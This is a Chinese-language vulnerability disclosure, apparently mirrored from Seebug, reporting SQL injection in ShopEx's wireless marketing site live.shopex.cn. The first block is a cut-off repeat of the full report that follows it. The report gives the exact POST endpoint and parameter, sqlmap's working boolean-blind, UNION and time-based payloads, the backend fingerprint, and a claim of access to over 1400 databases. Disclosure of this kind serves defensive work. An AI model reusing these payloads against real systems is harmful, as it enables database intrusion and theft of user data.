VULHUB ™

### 简要描述： ShopEx无线营销系统，1400多个库 ### 详细说明： 网站： http://live.shopex.cn/ [<img src="https://images.seebug.org/upload/201402/05214744e99a27d11964f21dfc9e9dd6b32de503.jpg" alt="3-1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/05214744e99a27d11964f21dfc9e9dd6b32de503.jpg) 注入点 http://live.shopex.cn:80/index.php/passport/passport/sel_region (POST) 参数p_region_id sqlmap identified the following injection points with a total of 80 HTTP(s) requests: --- Place: (custom) POST Parameter: #1* Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: p_region_id=' RLIKE IF(7814=7814,0x705f726567696f6e5f69643d2a,0x28) AND 'CNmq'='CNmq Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: p_region_id=' UNION ALL SELECT CONCAT(0x7174677a71,0x677754534a75516c5142,0x7176626271),NULL# Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload:...

### 简要描述： ShopEx无线营销系统，1400多个库 ### 详细说明： 网站： http://live.shopex.cn/ [<img src="https://images.seebug.org/upload/201402/05214744e99a27d11964f21dfc9e9dd6b32de503.jpg" alt="3-1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/05214744e99a27d11964f21dfc9e9dd6b32de503.jpg) 注入点 http://live.shopex.cn:80/index.php/passport/passport/sel_region (POST) 参数p_region_id sqlmap identified the following injection points with a total of 80 HTTP(s) requests: --- Place: (custom) POST Parameter: #1* Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: p_region_id=' RLIKE IF(7814=7814,0x705f726567696f6e5f69643d2a,0x28) AND 'CNmq'='CNmq Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: p_region_id=' UNION ALL SELECT CONCAT(0x7174677a71,0x677754534a75516c5142,0x7176626271),NULL# Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: p_region_id=' AND 1203=BENCHMARK(5000000,MD5(0x4f757a6a)) AND 'WAGO'='WAGO --- web application technology: Nginx, PHP 5.2.13 back-end DBMS: MySQL >= 5.0.0 用户： [<img src="https://images.seebug.org/upload/201402/0521504851dfaec19994194a63c5b83e0277ec6e.jpg" alt="3-2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/0521504851dfaec19994194a63c5b83e0277ec6e.jpg) 1400多个库，也太多了吧： [<img src="https://images.seebug.org/upload/201402/05215256282d8c5c3bcb733332929a6f31c8178d.jpg" alt="3-3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/05215256282d8c5c3bcb733332929a6f31c8178d.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201402/052155078e67a8765e1f40ed424d88499a294768.jpg" alt="3-4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/052155078e67a8765e1f40ed424d88499a294768.jpg)